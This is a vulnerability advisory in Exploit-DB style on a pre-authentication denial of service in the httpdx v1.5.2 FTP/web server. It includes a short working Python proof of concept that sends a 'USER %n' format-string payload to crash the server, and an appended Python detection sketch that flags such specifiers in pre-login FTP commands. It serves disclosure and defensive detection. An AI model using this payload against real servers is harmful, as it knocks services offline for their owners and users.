Vendor: httpdx
By: loneferret
CVSS: 7.5 (HIGH)
Remote Pre-Authentication DoS
Product Name: httpdx
Affected Version From: 1.5.2002
Affected Version To: 1.5.2002
Patch Exists: NO
Platforms Tested: Windows XP SP3
2010

httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)

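This proof of concept crashes the httpdx v1.5.2 server, causing a denial of service (DoS). Without authenticating, it connects to the server on port 21 and sends a USER command whose argument is the two-byte buffer "\x25\x6e" (the ASCII characters "%n"), which is enough to crash the server.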

Mitigation:

Update to a patched version of httpdx or use an alternative web server software.

Exploit-DB raw data:

# Title: httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)
# Found by: loneferret
# Hats off to dookie2000ca
# Discovered on: 06/02/2010
# Software link: http://httpdx.sourceforge.net/downloads/
# Tested on: Windows XP SP3 Professional

# Nod to the Exploit-DB Team

#!/usr/bin/python

import socket

buffer = "\x25\x6e"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21)) #Remember to put in the server's address
s.recv(1024)
s.send('USER '+ buffer +'\r\n') #yup, doesn't take much does it.
s.recv(1024) #
s.close() #don't really need these, force of habit
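
A detection sketch for the control-channel pattern the PoC sends (its buffer "\x25\x6e" is "%n"), added here as an example and not part of the original Exploit-DB entry: it flags printf-style conversion specifiers in the argument of pre-login FTP commands. The function names and the sample lines are constructed for illustration, and it assumes the crash comes from that specifier reaching a formatting routine, which the page does not state.

```python
import re

# printf-style conversion specifier: optional positional argument, flags,
# width, precision and length modifier, then the conversion character.
FORMAT_SPEC = re.compile(
    rb"%(?:\d+\$)?[-+ #0']*(?:\d+|\*)?(?:\.(?:\d+|\*))?"
    rb"(?:hh|h|ll|l|L|j|z|t)?[diouxXeEfgGaAcspn]"
)

# Commands a client can send before it is logged in (RFC 959 login sequence).
PRE_AUTH = {b"USER", b"PASS", b"ACCT"}


def inspect_ftp_line(line):
    """Return the conversion specifiers in a pre-login command's argument."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    if verb.upper() not in PRE_AUTH:
        return []
    arg = arg.replace(b"%%", b"")  # "%%" is a literal percent sign, not a conversion
    return [m.group(0).decode("ascii") for m in FORMAT_SPEC.finditer(arg)]


def scan(lines):
    """Return (line_number, verb, specifiers) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        specs = inspect_ftp_line(line)
        if specs:
            verb = line.split(b" ", 1)[0].upper().decode("ascii", "replace")
            hits.append((number, verb, specs))
    return hits


# Constructed control-channel capture (not taken from a real session).
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS 100%%\r\n",
    b"USER %n\r\n",
    b"user %08x.%08x\r\n",
    b"RETR report%20final.txt\r\n",  # "%20f" looks like a conversion, but is post-login
]

if __name__ == "__main__":
    for number, verb, specs in scan(SAMPLE):
        print(f"line {number}: {verb} argument contains {specs}")
```

Restricting the check to pre-login commands keeps URL-encoded file names in later commands from raising false positives.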